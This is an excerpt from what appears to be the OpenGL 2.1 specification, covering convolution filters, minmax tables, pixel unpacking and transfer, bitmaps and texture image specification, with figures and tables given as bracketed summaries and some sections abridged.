The image is formed with coordinates i such that i increases from left to right, starting at zero. Image location i is specified by the ith pixel, counting from zero.

The error INVALID_VALUE is generated if width is greater than the maximum supported value. This value is queried using GetConvolutionParameteriv, setting target to CONVOLUTION_1D and pname to MAX_CONVOLUTION_WIDTH.

Special facilities are provided for the definition of two-dimensional separable filters – filters whose image can be represented as the product of two one-dimensional images, rather than as full two-dimensional images. A two-dimensional separable convolution filter is specified with

    void SeparableFilter2D( enum target, enum internalformat, sizei width, sizei height, enum format, enum type, void *row, void *column );

target must be SEPARABLE_2D. internalformat specifies the formats of the table entries of the two one-dimensional images that will be retained. row points to a width pixel wide image of the specified format and type. column points to a height pixel high image, also of the specified format and type.
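The "product of two one-dimensional images" can be sketched for a single component as an outer product (a hypothetical helper illustrating what a separable filter represents):

```python
def separable_filter_2d(row, column):
    """The two-dimensional filter a separable filter represents:
    filter[m][n] = row[n] * column[m], for a width-element row image
    and a height-element column image."""
    return [[r * c for r in row] for c in column]
```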
The two images are extracted from memory and processed as if ConvolutionFilter1D were called separately for each, except that each image is scaled and biased by the two-dimensional separable CONVOLUTION_FILTER_SCALE and CONVOLUTION_FILTER_BIAS parameters. These parameters are specified exactly as the one-dimensional and two-dimensional parameters, except that ConvolutionParameteriv is called with target SEPARABLE_2D.

One- and two-dimensional filters may also be specified using image data taken directly from the framebuffer. The required state for a convolution filter consists of the filter image arrays (two one-dimensional image arrays for the separable case), an integer describing the internal format of the filter, and two groups of four floating-point numbers to store the filter scale and bias.

Each initial convolution filter is null (zero width and height, internal format RGBA, with zero-sized components). The initial value of all scale parameters is (1,1,1,1) and the initial value of all bias parameters is (0,0,0,0).

A minmax table is specified with

    void Minmax( enum target, enum internalformat, boolean sink );

target must be MINMAX. internalformat specifies the format of the table entries. sink specifies whether pixel groups will be consumed by the minmax operation (TRUE) or passed on to final conversion (FALSE).

The error INVALID_ENUM is generated if internalformat is not one of the formats in table 3.15 or table 3.16, or is 1, 2, 3, 4, or any of the DEPTH or INTENSITY formats in those tables. The resulting table always has 2 entries, each with values corresponding only to the components of the internal format.

The state necessary for minmax operation is a table containing two elements (the first element stores the minimum values, the second stores the maximum values), an integer describing the internal format of the table, and a flag indicating whether or not pixel groups are consumed by the operation. The initial state is a minimum table entry set to the maximum representable value and a maximum table entry set to the minimum representable value. Internal format is set to RGBA and the initial value of the flag is false.
Unpacking

Data are taken from the currently bound pixel unpack buffer or client memory as a sequence of signed or unsigned bytes (GL data types byte and ubyte), signed or unsigned short integers (GL data types short and ushort), signed or unsigned integers (GL data types int and uint), or floating point values (GL data type float). These elements are grouped into sets of one, two, three, or four values, depending on the format, to form a group. Table 3.6 summarizes the format of groups obtained from memory; it also indicates those formats that yield indices and those that yield components.

If a pixel unpack buffer is bound (as indicated by a non-zero value of PIXEL_UNPACK_BUFFER_BINDING), data is an offset into the pixel unpack buffer and the pixels are unpacked from the buffer relative to this offset; otherwise, data is a pointer to client memory and the pixels are unpacked from client memory relative to the pointer. If a pixel unpack buffer object is bound and unpacking the pixel data according to the process described below would access memory beyond the size of the pixel unpack buffer's memory size, an INVALID_OPERATION error results.

[Figure: the pixel transfer pipeline — unpack RGBA or color index groups, convert to float (and luminance to RGB), scale, shift, bias and offset, index and RGBA-to-RGBA lookups, color table lookup, convolution, color matrix, and minmax operations.]

[Table 3.5: DrawPixels and ReadPixels type parameter values and the corresponding GL data types. Refer to table 2.2 for definitions of GL data types. Special interpretations are described near the end of section 3.6.4.]

[Table 3.6: DrawPixels and ReadPixels formats. The second column gives a description of and the number and order of elements in a group. Unless specified as an index, formats yield components.]

If a pixel unpack buffer object is bound and data is not evenly divisible by the number
of basic machine units needed to store in memory the corresponding GL data type from table 3.5 for the type parameter, an INVALID_OPERATION error results.

By default the values of each GL data type are interpreted as they would be specified in the language of the client's GL binding. If UNPACK_SWAP_BYTES is enabled, however, then the values are interpreted with the bit orderings modified as per table 3.7. The modified bit orderings are defined only if the GL data type ubyte has eight bits, and then for each specific GL data type only if that type is represented with 8, 16, or 32 bits.

The groups in memory are treated as being arranged in a rectangle.

[Table 3.7: Bit ordering modification of elements when UNPACK_SWAP_BYTES is enabled. These reorderings are defined only when GL data type ubyte has 8 bits, and then only for GL data types with 8, 16, or 32 bits. Bit 0 is the least significant.]

This rectangle consists of a series of rows, with the first element of the first group of the first row pointed to by the pointer passed to DrawPixels. If the value of UNPACK_ROW_LENGTH is not positive, then the number of groups in a row is width; otherwise the number of groups is UNPACK_ROW_LENGTH. If p indicates the location in memory of the first element of the first row, then the first element of the Nth row is indicated by

    p + N k    (3.12)

[Figure 3.8. Selecting a subimage from an image. The indicated parameter names (ROW_LENGTH, SKIP_PIXELS, SKIP_ROWS) are prefixed by UNPACK for DrawPixels and by PACK for ReadPixels.]

Bitfield locations of the first, second, third, and fourth components of each packed pixel type are illustrated in tables 3.9, 3.10, and 3.11. Each bitfield is interpreted as an unsigned integer value. If the base GL type is supported with more than the minimum precision (e.g. a 9-bit byte) the packed components are right-justified in the pixel.
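The definition of the row stride k used in eq. 3.12 is elided in this excerpt; the full specification gives it in terms of the components per group n, the row length in groups l, the element size s, and the row alignment a. It can be sketched as:

```python
import math

def row_stride_elements(n_components, row_length, element_size, alignment):
    """Number of elements k between the first elements of successive rows,
    so the Nth row starts at p + N*k (eq. 3.12): k = n*l when s >= a,
    otherwise (a/s) * ceil(s*n*l / a), with sizes in basic machine units."""
    n, l, s, a = n_components, row_length, element_size, alignment
    if s >= a:
        return n * l
    return (a // s) * math.ceil(s * n * l / a)
```

For example, rows of 5 RGB ubyte pixels with 4-byte alignment occupy 16 elements per row rather than 15.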
Components are normally packed with the first component in the most significant bits of the bitfield, and successive components occupying progressively less significant locations. Types whose token names end with _REV reverse the component packing order from least to most significant locations. In all cases, the most significant bit of each component is packed in the most significant bit location of its location in the bitfield.

[Table 3.9: UNSIGNED_BYTE formats (bit layout of UNSIGNED_BYTE_3_3_2). Bit numbers are indicated for each component.]

[Table 3.10: UNSIGNED_SHORT formats (bit layouts of UNSIGNED_SHORT_5_6_5, UNSIGNED_SHORT_4_4_4_4, and UNSIGNED_SHORT_5_5_5_1).]

[Table 3.11: UNSIGNED_INT formats (bit layouts of UNSIGNED_INT_8_8_8_8 and UNSIGNED_INT_10_10_10_2).]

In the case of 1-bit elements, k is computed as

    k = 8a ⌈l / (8a)⌉    (3.14)

There is a mechanism for selecting a sub-rectangle of elements from a BITMAP image as well. Before obtaining the first element from memory, the pointer supplied to DrawPixels is effectively advanced by UNPACK_SKIP_ROWS ∗ k ubytes. Then UNPACK_SKIP_PIXELS 1-bit elements are ignored, and the subsequent width 1-bit elements are obtained, without advancing the ubyte pointer, after which the pointer is advanced by k ubytes. height sets of width elements are obtained this way.

Conversion to floating-point

This step applies only to groups of components. It is not performed on indices. Each element in a group is converted to a floating-point value according to the appropriate formula in table 2.9 (section 2.14). For packed pixel types, each element in the group is converted by computing c / (2ᴺ − 1), where c is the unsigned integer value of the bitfield containing the element and N is the number of bits in the bitfield.

Conversion to RGB

This step is applied only if the format is LUMINANCE or LUMINANCE_ALPHA.
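Extracting the bitfields of a packed type and applying the c / (2ᴺ − 1) conversion can be sketched as follows (hypothetical helpers, shown for UNSIGNED_SHORT_5_6_5):

```python
def unpack_565(value):
    """Split an UNSIGNED_SHORT_5_6_5 pixel into its three bitfields:
    the first component in the most significant bits (15..11), then
    bits 10..5, then bits 4..0, each read as an unsigned integer."""
    return (value >> 11) & 0x1F, (value >> 5) & 0x3F, value & 0x1F

def bitfield_to_float(c, nbits):
    """Convert a packed bitfield to floating point as c / (2**N - 1)."""
    return c / (2 ** nbits - 1)
```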
If the format is LUMINANCE, then each group of one element is converted to a group of R, G, and B (three) elements by copying the original single element into each of the three new elements. If the format is LUMINANCE_ALPHA, then each group of two elements is converted to a group of R, G, B, and A (four) elements by copying the first original element into each of the first three new elements and copying the second original element to the A (fourth) new element.

Final Conversion

For a color index, final conversion consists of masking the bits of the index to the left of the binary point by 2ⁿ − 1, where n is the number of bits in an index buffer. For RGBA components, each element is clamped to [0, 1]. The resulting values are converted to fixed-point according to the rules given in section 2.14.9 (Final Color Processing).

For a depth component, an element is first clamped to [0, 1] and then converted to fixed-point as if it were a window z value (see section 2.11.1, Controlling the Viewport).

Conversion to Fragments

The conversion of a group to fragments is controlled with

    void DrawPixels( sizei width, sizei height, enum format, enum type, void *data );

Let (xrp, yrp) be the current raster position (section 2.13). (If the current raster position is invalid, then DrawPixels is ignored; pixel transfer operations do not update the histogram or minmax tables, and no fragments are generated. However, the histogram and minmax tables are updated even if the corresponding fragments are later rejected by the pixel ownership (section 4.1.1) or scissor (section 4.1.2) tests.) If a particular group (index or components) is the nth in a row and belongs to the mth row, consider the region in window coordinates bounded by the rectangle with corners

1. RGBA component: Each group comprises four color components: red, green, blue, and alpha.

Each operation described in this section is applied sequentially to each pixel group in an image. Many operations are applied only to pixel groups of certain kinds; if an operation is not applicable to a given group, it is skipped.
Arithmetic on Components

This step applies only to RGBA component and depth component groups. Each component is multiplied by an appropriate signed scale factor: RED_SCALE for an R component, GREEN_SCALE for a G component, BLUE_SCALE for a B component, and ALPHA_SCALE for an A component, or DEPTH_SCALE for a depth component. Then the result is added to the appropriate signed bias: RED_BIAS, GREEN_BIAS, BLUE_BIAS, ALPHA_BIAS, or DEPTH_BIAS.

Arithmetic on Indices

This step applies only to color index and stencil index groups. If the index is a floating-point value, it is converted to fixed-point, with an unspecified number of bits to the right of the binary point and at least ⌈log₂(MAX_PIXEL_MAP_TABLE)⌉ bits to the left of the binary point. Indices that are already integers remain so; any fraction bits in the resulting fixed-point value are zero.

The fixed-point index is then shifted by |INDEX_SHIFT| bits, left if INDEX_SHIFT > 0 and right otherwise. In either case the shift is zero-filled. Then, the signed integer offset INDEX_OFFSET is added to the index.

RGBA to RGBA Lookup

This step applies only to RGBA component groups, and is skipped if MAP_COLOR is FALSE. First, each component is clamped to the range [0, 1]. There is a table associated with each of the R, G, B, and A component elements: PIXEL_MAP_R_TO_R for R, PIXEL_MAP_G_TO_G for G, PIXEL_MAP_B_TO_B for B, and PIXEL_MAP_A_TO_A for A. Each element is multiplied by an integer one less than the size of the corresponding table, and, for each element, an address is found by rounding this value to the nearest integer. For each element, the addressed value in the corresponding table replaces the element.

[Table 3.13: Color table lookup. Rt, Gt, Bt, At, Lt, and It are color table values that are assigned to pixel components R, G, B, and A depending on the table format. When there is no assignment, the component value is left unchanged by lookup.]
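The two arithmetic steps can be sketched in Python (hypothetical helpers mirroring the scale/bias and shift/offset rules above):

```python
def transfer_component(c, scale, bias):
    """Arithmetic on a component: multiply by the signed *_SCALE factor,
    then add the signed *_BIAS value."""
    return c * scale + bias

def transfer_index(index, index_shift, index_offset):
    """Arithmetic on an index: shift by |INDEX_SHIFT| bits (left if
    INDEX_SHIFT > 0, right otherwise, zero-filled), then add the signed
    INDEX_OFFSET."""
    if index_shift >= 0:
        index <<= index_shift
    else:
        index >>= -index_shift
    return index + index_offset
```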
The internal format of the table determines which components of the group will be replaced (see table 3.13). The components to be replaced are converted to indices by clamping to [0, 1], multiplying by an integer one less than the width of the table, and rounding to the nearest integer. Components are replaced by the table entry at the index.

The required state is one bit indicating whether color table lookup is enabled or disabled. In the initial state, lookup is disabled.

Convolution

This step applies only to RGBA component groups. If CONVOLUTION_1D is enabled, the one-dimensional convolution filter is applied only to the one-dimensional texture images passed to TexImage1D, TexSubImage1D, CopyTexImage1D, and CopyTexSubImage1D. If CONVOLUTION_2D is enabled, the two-dimensional convolution filter is applied only to the two-dimensional images passed to DrawPixels, CopyPixels, ReadPixels, TexImage2D, TexSubImage2D, CopyTexImage2D, CopyTexSubImage2D, and CopyTexSubImage3D. If SEPARABLE_2D is enabled, and CONVOLUTION_2D is disabled, the separable two-dimensional convolution filter is instead applied to these images.

The convolution operation is a sum of products of source image pixels and convolution filter pixels. Source image pixels always have four components: red, green, blue, and alpha, denoted in the equations below as Rs, Gs, Bs, and As. Filter pixels may be stored in one of five formats, with 1, 2, 3, or 4 components. These components are denoted as Rf, Gf, Bf, Af, Lf, and If in the equations below. The result of the convolution operation is the 4-tuple R, G, B, A. Depending on the internal format of the filter, individual color components of each source image pixel are convolved with one filter component, or are passed unmodified. The rules for this are defined in table 3.14.

The convolution operation is defined differently for each of the three convolution filters. The variables Wf and Hf refer to the dimensions of the convolution filter.
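The component-to-index conversion for table lookup can be sketched as (a hypothetical helper; note Python's round uses banker's rounding at exact halves):

```python
def color_table_index(component, table_width):
    """Convert a component to a color table index: clamp to [0, 1],
    multiply by one less than the table width, round to nearest."""
    c = min(max(component, 0.0), 1.0)
    return int(round(c * (table_width - 1)))
```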
The variables Ws and Hs refer to the dimensions of the source pixel image.

The convolution equations are defined as follows, where C refers to the filtered result, Cf refers to the one- or two-dimensional convolution filter, and Crow and Ccolumn refer to the two one-dimensional filters comprising the two-dimensional separable filter. Cs′ depends on the source image color Cs and the convolution border mode as described below. Cr, the filtered output image, depends on all of these variables and is described separately for each border mode. The pixel indexing nomenclature is described in the Convolution Filter Specification subsection of section 3.6.3.

One-dimensional filter:

    C[i′] = Σ_{n=0}^{Wf−1} Cs′[i′ + n] ∗ Cf[n]

Two-dimensional filter:

    C[i′, j′] = Σ_{n=0}^{Wf−1} Σ_{m=0}^{Hf−1} Cs′[i′ + n, j′ + m] ∗ Cf[n, m]

Two-dimensional separable filter:

    C[i′, j′] = Σ_{n=0}^{Wf−1} Σ_{m=0}^{Hf−1} Cs′[i′ + n, j′ + m] ∗ Crow[n] ∗ Ccolumn[m]

The convolution border mode is specified by calling ConvolutionParameter, where target is the name of the filter, pname is CONVOLUTION_BORDER_MODE, and param is one of REDUCE, CONSTANT_BORDER, or REPLICATE_BORDER.

If the convolution border mode is CONSTANT_BORDER, the output image has the same dimensions as the source image, and the convolution is performed using the convolution border color Cc, the RGBA color to be used as the image border. Integer color components are interpreted linearly such that the most positive integer maps to 1.0, and the most negative integer maps to −1.0. Floating point color components are not clamped when they are specified.

For a one-dimensional filter, the result color is defined by

    Cr[i] = C[i − Cw]

where C[i′] is computed using the following equation for Cs′[i′]:

    Cs′[i′] = Cs[i′],  0 ≤ i′ < Ws
              Cc,      otherwise

For a two-dimensional or two-dimensional separable filter, the result color is defined by

    Cr[i, j] = C[i − Cw, j − Ch]

where C[i′, j′] is computed using the following equation for Cs′[i′, j′]:

    Cs′[i′, j′] = Cs[i′, j′],  0 ≤ i′ < Ws, 0 ≤ j′ < Hs
                  Cc,          otherwise

If the convolution border mode is REPLICATE_BORDER, the output image also has the same dimensions as the source image, and the convolution is performed as if the outermost pixels of the source image were replicated. For a one-dimensional filter, the result color is defined by

    Cr[i] = C[i − Cw]

where C[i′] is computed using the following equation for Cs′[i′]:

    Cs′[i′] = Cs[clamp(i′, 0, Ws − 1)]

with clamp(val, low, high) = max(min(val, high), low). Similarly, for a two-dimensional or two-dimensional separable filter,

    Cr[i, j] = C[i − Cw, j − Ch]

where C[i′, j′] is computed using the following equation for Cs′[i′, j′]:

    Cs′[i′, j′] = Cs[clamp(i′, 0, Ws − 1), clamp(j′, 0, Hs − 1)]

The groups of red, green, blue, and alpha are transformed to

    [R′]   [Rs  0   0   0 ]      [R]   [Rb]
    [G′] = [0   Gs  0   0 ] Mc ∗ [G] + [Gb]
    [B′]   [0   0   Bs  0 ]      [B]   [Bb]
    [A′]   [0   0   0   As]      [A]   [Ab]

where Mc is the color matrix.

Histogram

Minmax

This step applies only to RGBA component groups. Minmax operation is enabled or disabled by calling Enable or Disable with the symbolic constant MINMAX.

If the format of the minmax table includes red or luminance, the red component value replaces the red or luminance value in the minimum table element if and only if it is less than that component. Likewise, if the format includes red or luminance and the red component of the group is greater than the red or luminance value in the maximum element, the red group component replaces the red or luminance maximum component. If the format of the table includes green, the green group component conditionally replaces the green minimum and/or maximum if it is smaller or larger, respectively. The blue and alpha group components are similarly tested and replaced, if the table format includes blue and/or alpha. The internal type of the minimum and maximum component values is floating point, with at least the same representable range as a floating point number used to represent colors (section 2.1.1). There are no semantics defined for the treatment of group component values that are outside the representable range.

Each group (n, m) is mapped to a rectangle with corners at

    (Xrp + Zx ∗ n, Yrp + Zy ∗ m)

and

    (Xrp + Zx ∗ (n + 1), Yrp + Zy ∗ (m + 1))

where Zx and Zy are the pixel zoom factors specified by PixelZoom, and may each be either positive or negative. A fragment representing group (n, m) is produced for each framebuffer pixel with one or more sample points that lie inside, or on the bottom or left boundary, of this rectangle. Each fragment so produced takes its associated data from the group and from the current raster position, in a manner consistent with the discussion in the Conversion to Fragments subsection of section 3.6.4. All depth and color sample values are assigned the same value, taken either from their group (for depth and color component groups) or from the current raster position (if they are not).
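The one-dimensional convolution and its border modes can be sketched as a single-component routine. This is a sketch, not the GL pipeline: it assumes Cw = ⌊Wf/2⌋ and that the REDUCE border mode shrinks the output to Ws − Wf + 1 entries, neither of which is stated in the surviving text here.

```c
#include <stddef.h>

enum border_mode { REDUCE, CONSTANT_BORDER, REPLICATE_BORDER };

/* Illustrative 1D, single-component convolution in the spec's
 * sum-of-products form.  `cc` is the constant border color component.
 * dst needs ws - wf + 1 entries for REDUCE, ws entries otherwise. */
static void convolve_1d(const float *src, int ws,
                        const float *filt, int wf,
                        enum border_mode mode, float cc,
                        float *dst)
{
    int cw = wf / 2;                         /* assumed Cw = floor(Wf/2) */
    int out_w = (mode == REDUCE) ? ws - wf + 1 : ws;
    for (int i = 0; i < out_w; i++) {
        int base = (mode == REDUCE) ? i : i - cw;   /* i' in the equations */
        float sum = 0.0f;
        for (int n = 0; n < wf; n++) {
            int k = base + n;
            float s;
            if (k >= 0 && k < ws)
                s = src[k];                  /* inside the source image */
            else if (mode == REPLICATE_BORDER)
                s = src[k < 0 ? 0 : ws - 1]; /* clamp(i', 0, Ws-1) */
            else
                s = cc;                      /* CONSTANT_BORDER color */
            sum += s * filt[n];
        }
        dst[i] = sum;
    }
}
```

With a box filter {1, 1, 1} over {1, 2, 3, 4}, REDUCE yields the two fully-overlapped sums, while the border modes keep the output the same size as the input.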
All sample values are assigned the same fog coordinate and the same set of texture coordinates, taken from the current raster position.

A single pixel rectangle will generate multiple, perhaps very many fragments for the same framebuffer pixel, depending on the pixel zoom factors.

3.7 Bitmaps

Bitmaps are rectangles of zeros and ones specifying a particular pattern of fragments to be produced. Each of these fragments has the same associated data. These data are those associated with the current raster position.

[Figure 3.9. A bitmap and its associated parameters (w = 8, h = 12, xbo = 2.5, ybo = 1.0). xbi and ybi are not shown.]

w and h comprise the integer width and height of the rectangular bitmap, respectively. (xbo, ybo) gives the floating-point x and y values of the bitmap's origin. (xbi, ybi) gives the floating-point x and y increments that are added to the raster position after the bitmap is rasterized. data is a pointer to a bitmap.

Like a polygon pattern, a bitmap is unpacked from memory according to the procedure given in section 3.6.4 for DrawPixels; it is as if the width and height passed to that command were equal to w and h, respectively, the type were BITMAP, and the format were COLOR_INDEX. The unpacked values (before any conversion or arithmetic would have been performed) form a stipple pattern of zeros and ones. See figure 3.9.

A bitmap sent using Bitmap is rasterized as follows. First, if the current raster position is invalid (the valid bit is reset), the bitmap is ignored. Otherwise, a rectangular array of fragments is constructed, with lower left corner at

    (xll, yll) = (⌊xrp − xbo⌋, ⌊yrp − ybo⌋)

and upper right corner at (xll + w, yll + h), where w and h are the width and height of the bitmap, respectively. Fragments in the array are produced if the corresponding bit in the bitmap is 1 and not produced otherwise. The associated data for each fragment are those associated with the current raster position.
Once the fragments have been produced, the current raster position is updated:

    (xrp, yrp) ← (xrp + xbi, yrp + ybi)

3.8 Texturing

Texturing maps a portion of one or more specified images onto each primitive for which texturing is enabled. This mapping is accomplished by using the color of an image at the location indicated by a texture coordinate set's (s, t, r, q) coordinates.

Implementations must support texturing using at least two images at a time. Each fragment or vertex carries multiple sets of texture coordinates (s, t, r, q) which are used to index separate images to produce color values which are collectively used to modify the resulting transformed vertex or fragment color. Texturing is specified only for RGBA mode; its use in color index mode is undefined. The following subsections (up to and including section 3.8.8) specify the GL operation with a single texture and section 3.8.16 specifies the details of how multiple texture units interact.

The GL provides two ways to specify the details of how texturing of a primitive is effected. The first is referred to as fixed-functionality, and is described in this section. The second is referred to as a fragment shader, and is described in section 3.11. The specification of the image to be texture mapped and the means by which the image is filtered when applied to the primitive are common to both methods and are discussed in this section. The fixed functionality method for determining what RGBA value is produced is also described in this section. If a fragment shader is active, the method for determining the RGBA value is specified by an application-supplied fragment shader as described in the OpenGL Shading Language Specification.

When no fragment shader is active, the coordinates used for texturing are (s/q, t/q, r/q), derived from the original texture coordinates (s, t, r, q). If the q texture coordinate is less than or equal to zero, the coordinates used for texturing are undefined.
When a fragment shader is active, the (s, t, r, q) coordinates are available to the fragment shader. The coordinates used for texturing in a fragment shader are defined by the OpenGL Shading Language Specification.

Table 3.15: Conversion from RGBA and depth pixel components to internal texture, table, or filter components. See section 3.8.13 for a description of the texture components R, G, B, A, L, I, and D.

Sized Internal Format   Base Internal Format   R bits  G bits  B bits  A bits  L bits  I bits  D bits
ALPHA4                  ALPHA                                          4
ALPHA8                  ALPHA                                          8
ALPHA12                 ALPHA                                          12
ALPHA16                 ALPHA                                          16
DEPTH_COMPONENT16       DEPTH_COMPONENT                                                        16
DEPTH_COMPONENT24       DEPTH_COMPONENT                                                        24
DEPTH_COMPONENT32       DEPTH_COMPONENT                                                        32
LUMINANCE4              LUMINANCE                                              4
LUMINANCE8              LUMINANCE                                              8
LUMINANCE12             LUMINANCE                                              12
LUMINANCE16             LUMINANCE                                              16
LUMINANCE4_ALPHA4       LUMINANCE_ALPHA                        4       4
LUMINANCE6_ALPHA2       LUMINANCE_ALPHA                        2       6
LUMINANCE8_ALPHA8       LUMINANCE_ALPHA                        8       8
LUMINANCE12_ALPHA4      LUMINANCE_ALPHA                        4       12
LUMINANCE12_ALPHA12     LUMINANCE_ALPHA                        12      12
LUMINANCE16_ALPHA16     LUMINANCE_ALPHA                        16      16
INTENSITY4              INTENSITY                                                      4
INTENSITY8              INTENSITY                                                      8
INTENSITY12             INTENSITY                                                      12
INTENSITY16             INTENSITY                                                      16
R3_G3_B2                RGB                    3       3       2
RGB4                    RGB                    4       4       4
RGB5                    RGB                    5       5       5
RGB8                    RGB                    8       8       8
RGB10                   RGB                    10      10      10
RGB12                   RGB                    12      12      12
RGB16                   RGB                    16      16      16
RGBA2                   RGBA                   2       2       2       2
RGBA4                   RGBA                   4       4       4       4
RGB5_A1                 RGBA                   5       5       5       1
RGBA8                   RGBA                   8       8       8       8
RGB10_A2                RGBA                   10      10      10      2
RGBA12                  RGBA                   12      12      12      12
RGBA16                  RGBA                   16      16      16      16

Table 3.17: Generic and specific compressed internal formats. No specific formats are defined by OpenGL 2.1; however, several specific compression types are defined in GL extensions.

image format may not be affected by the data parameter. Allocations must be invariant; the same allocation and compressed image format must be chosen each time a texture image is specified with the same parameter values. These allocation rules also apply to proxy textures, which are described in section 3.8.11.
The image itself (referred to by data) is a sequence of groups of values. The first group is the lower left back corner of the texture image. Subsequent groups fill out rows of width width from left to right; height rows are stacked from bottom to top forming a single two-dimensional image slice; and depth slices are stacked from back to front. When the final R, G, B, and A components have been computed for a group, they are assigned to components of a texel as described by table 3.15. Counting from zero, each resulting Nth texel is assigned internal integer coordinates (i, j, k), where

    i = (N mod width) − bs
    j = (⌊N / width⌋ mod height) − bs
    k = (⌊N / (width × height)⌋ mod depth) − bs

and bs is the specified border width. Thus the last two-dimensional image slice of the three-dimensional image is indexed with the highest value of k.

Each color component is converted (by rounding to nearest) to a fixed-point value with n bits, where n is the number of bits of storage allocated to that component in the image array. We assume that the fixed-point representation used represents each value k/(2^n − 1), where k ∈ {0, 1, ..., 2^n − 1}, as k (e.g. 1.0 is represented in binary as a string of all ones).

The level argument to TexImage3D is an integer level-of-detail number. Levels of detail are discussed below, under Mipmapping. The main texture image has a level of detail number of 0. If a level-of-detail less than zero is specified, the error INVALID_VALUE is generated.

The border argument to TexImage3D is a border width. The significance of borders is described below. The border width affects the dimensions of the texture image: let

    ws = wt + 2bs    (3.15)
    hs = ht + 2bs    (3.16)
    ds = dt + 2bs    (3.17)

If the null texture is specified for the level-of-detail specified by texture parameter TEXTURE_BASE_LEVEL (see section 3.8.4), it is as if texturing were disabled.

Currently, the maximum border width bt is 1. If bs is less than zero, or greater than bt, then the error INVALID_VALUE is generated.
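The texel-addressing equations above can be sketched directly. The function name is illustrative; it simply evaluates i, j, and k for the Nth group with border width bs.

```c
/* Internal texel coordinates for the Nth pixel group, per the indexing
 * equations: the border width bs shifts the origin to -bs.  Sketch only. */
static void texel_coords(long n, int width, int height, int depth, int bs,
                         int *i, int *j, int *k)
{
    *i = (int)(n % width) - bs;
    *j = (int)((n / width) % height) - bs;
    *k = (int)((n / ((long)width * height)) % depth) - bs;
}
```

For a 4 × 3 × 2 image with no border, group 13 lands at (1, 0, 1): it is the second texel of the first row of the second slice.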
The maximum allowable width, height, or depth of a three-dimensional texture image is an implementation dependent function of the level-of-detail and internal format of the resulting image array. It must be at least 2^(k−lod) + 2bt for image arrays of level-of-detail 0 through k, where k is the log base 2 of MAX_3D_TEXTURE_SIZE, lod is the level-of-detail of the image array, and bt is the maximum border width. It may be zero for image arrays of any level-of-detail greater than k. The error INVALID_VALUE is generated if the specified image is too large to be stored under any conditions.

If a pixel unpack buffer object is bound and storing texture data would access memory beyond the end of the pixel unpack buffer, an INVALID_OPERATION error results.

In a similar fashion, the maximum allowable width of a one- or two-dimensional texture image, and the maximum allowable height of a two-dimensional texture image, must be at least 2^(k−lod) + 2bt for image arrays of level 0 through k, where k is the log base 2 of MAX_TEXTURE_SIZE. The maximum allowable width and height of a cube map texture must be the same, and must be at least 2^(k−lod) + 2bt for image arrays level 0 through k, where k is the log base 2 of MAX_CUBE_MAP_TEXTURE_SIZE.

An implementation may allow an image array of level 0 to be created only if that single image array can be supported. Additional constraints on the creation of image arrays of level 1 or greater are described in more detail in section 3.8.10.

The command TexImage2D is used to specify a two-dimensional texture image or one face of a cube map texture. Additionally, target may be either PROXY_TEXTURE_2D for a two-dimensional proxy texture or PROXY_TEXTURE_CUBE_MAP for a cube map proxy texture in the special case discussed in section 3.8.11. The other parameters match the corresponding parameters of TexImage3D.
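The sizing rule above, the required minimum dimension 2^(k−lod) + 2bt for levels 0 through k, is easy to evaluate. A minimal sketch, assuming the "may be zero beyond level k" case is reported as 0:

```c
/* Minimum required texture dimension at a given level-of-detail:
 * 2^(k - lod) + 2*bt for lod in [0, k], where k = log2 of the relevant
 * MAX_*_TEXTURE_SIZE and bt is the maximum border width.  Sketch only;
 * returns 0 beyond level k, where support is not required. */
static int min_required_dim(int k, int lod, int bt)
{
    if (lod > k)
        return 0;
    return (1 << (k - lod)) + 2 * bt;
}
```

For example, with MAX_3D_TEXTURE_SIZE = 256 (k = 8) and bt = 1, level 0 must support at least 258 texels per axis and level 8 at least 3.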
For the purposes of decoding the texture image, TexImage2D is equivalent to calling TexImage3D with corresponding arguments and depth of 1, except that

The image indicated to the GL by the image pointer is decoded and copied into the GL's internal memory. This copying effectively places the decoded image inside a border of the maximum allowable width bt whether or not a border has been specified (see figure 3.10). If no border or a border smaller than the maximum allowable width has been specified, then the image is still stored as if it were surrounded by a border of the maximum possible width. Any excess border (which surrounds the specified image, including any border) is assigned unspecified values. A two-dimensional texture has a border only at its left, right, top, and bottom ends, and a one-dimensional texture has a border only at its left and right ends.

We shall refer to the (possibly border augmented) decoded image as the texture array. A three-dimensional texture array has width, height, and depth ws, hs, and ds as defined respectively in equations 3.15, 3.16, and 3.17. A two-dimensional texture array has depth ds = 1, with height hs and width ws as above, and a one-dimensional texture array has depth ds = 1, height hs = 1, and width ws as above.

An element (i, j, k) of the texture array is called a texel (for a two-dimensional texture, k is irrelevant; for a one-dimensional texture, j and k are both irrelevant). The texture value used in texturing a fragment is determined by that fragment's associated (s, t, r) coordinates, but may not correspond to any actual texel. See figure 3.10.

If the data argument of TexImage1D, TexImage2D, or TexImage3D is a null pointer (a zero-valued pointer in the C implementation), and the pixel unpack buffer object is zero, a one-, two-, or three-dimensional texture array is created with the specified target, level, internalformat, border, width, height, and depth, but with unspecified image contents.
In this case no pixel values are accessed in client memory, and no pixel processing is performed. Errors are generated, however, exactly as though the data pointer were valid. Otherwise if the pixel unpack buffer object is non-zero, the data argument is treated normally to refer to the beginning of the pixel unpack buffer object's data.

[Figure 3.10. A texture image and the coordinates used to access it. This is a two-dimensional texture with n = 3 and m = 2. A one-dimensional texture would consist of a single horizontal strip. α and β, values used in blending adjacent texels to obtain a texture value, are also shown.]

TexSubImage2D arguments width, height, format, type, and data match the corresponding arguments to TexImage2D, and TexSubImage1D arguments width, format, type, and data match the corresponding arguments to TexImage1D.

CopyTexSubImage3D and CopyTexSubImage2D arguments x, y, width, and height match the corresponding arguments to CopyTexImage2D. CopyTexSubImage1D arguments x, y, and width match the corresponding arguments to CopyTexImage1D. Each of the TexSubImage commands interprets and processes pixel groups in exactly the manner of its TexImage counterpart, except that the assignment of R, G, B, A, and depth pixel group values to the texture components is controlled by the internalformat of the texture array, not by an argument to the command. The same constraints and errors apply to the TexSubImage commands' argument format and the internalformat of the texture array being respecified as apply to the format and internalformat arguments of its TexImage counterparts.

Arguments xoffset, yoffset, and zoffset of TexSubImage3D and CopyTexSubImage3D specify the lower left texel coordinates of a width-wide by height-high by depth-deep rectangular subregion of the texture array.
The depth argument associated with CopyTexSubImage3D is always 1, because framebuffer memory is two-dimensional; only a portion of a single s, t slice of a three-dimensional texture is replaced by CopyTexSubImage3D. (Because the framebuffer is inherently two-dimensional, there is no CopyTexImage3D command.)

